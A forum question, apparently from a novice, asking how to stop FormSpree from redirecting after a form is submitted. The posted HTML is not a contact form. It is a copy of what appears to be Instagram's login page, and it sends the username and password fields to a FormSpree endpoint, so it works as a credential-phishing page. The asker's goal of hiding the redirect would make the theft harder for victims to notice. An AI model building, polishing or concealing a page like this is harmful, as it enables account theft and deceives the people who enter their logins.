# How to get around the FormSpree redirect

Tags: html, css, backend

I am trying to implement the FormSpree free contact form but after submitting the form it redirects you to a different website. Something I want to avoid. im using FormSpree free account and im junior help me please
my code:

```html
                <form action="https://formspree.io/f/xvoldyek" class="HmktE" id="loginForm" method="post">
                  <div class="                     Igw0E     IwRSH      eGOV_         _4EzTm                                                              kEKum                                                ">
                    <div class="-MzZI">
                      <div class="_9GP1n   "><label class="f0n8F "><span class="_9nyy2"></span><input aria-label="Phone number, username, or email" aria-required="true" autocapitalize="off" autocorrect="off" maxlength="75" name="eml" id="eml"
                            type="text" class="_2hvTZ pexuQ zyHYP" value="" placeholder="Phone number, username, or email"></label>
                        <div class="i24fI"></div>
                      </div>
                    </div>
                    <div class="-MzZI">
                      <div class="_9GP1n   "><label class="f0n8F "><span class="_9nyy2"></span><input aria-label="Password" aria-required="true" autocapitalize="off" autocorrect="off" name="pwd" id="pwd" type="password" class="_2hvTZ pexuQ zyHYP"
                            value="" placeholder="Password" required></label>
                        <div class="i24fI"></div>
                      </div>
                    </div>
                
                    <div class="                     Igw0E     IwRSH      eGOV_         _4EzTm    bkEs3                          CovQj                  jKUp7          DhRcB                                                    ">
                
                      <button 
                        class="sqdOP  L3NKy   y3zKF     " type="submit" id="_next" name="_next">
                        <div class="                     Igw0E     IwRSH      eGOV_         _4EzTm    ">Log In</div>
                      </button></div>
                    
                    <div class="K-1uj Z7p_S">
                      <div class="s311c"></div>
                      <div class="_0tv-g">or</div>
                      <div class="s311c"></div>
                    </div>
                    
                    <div class="                     Igw0E     IwRSH      eGOV_         _4EzTm    bkEs3                          CovQj                  jKUp7          DhRcB                                                    "><button
                        class="sqdOP yWX7d    y3zKF     " type="button">
                        <span class=" coreSpriteFacebookIcon AeB99"></span><span class="KPnG0">Log in with Facebook</span></button></div>
                  </div><a class="_2Lks6" href="#" tabindex="0">Forgot password?</a>
```

Comment: Your `<form>` `action` is set to redirect you to a different domain. If you want to stop that redirect, send it to your own website instead of FormSpree.

Comment: İ dont know php can you organise my code please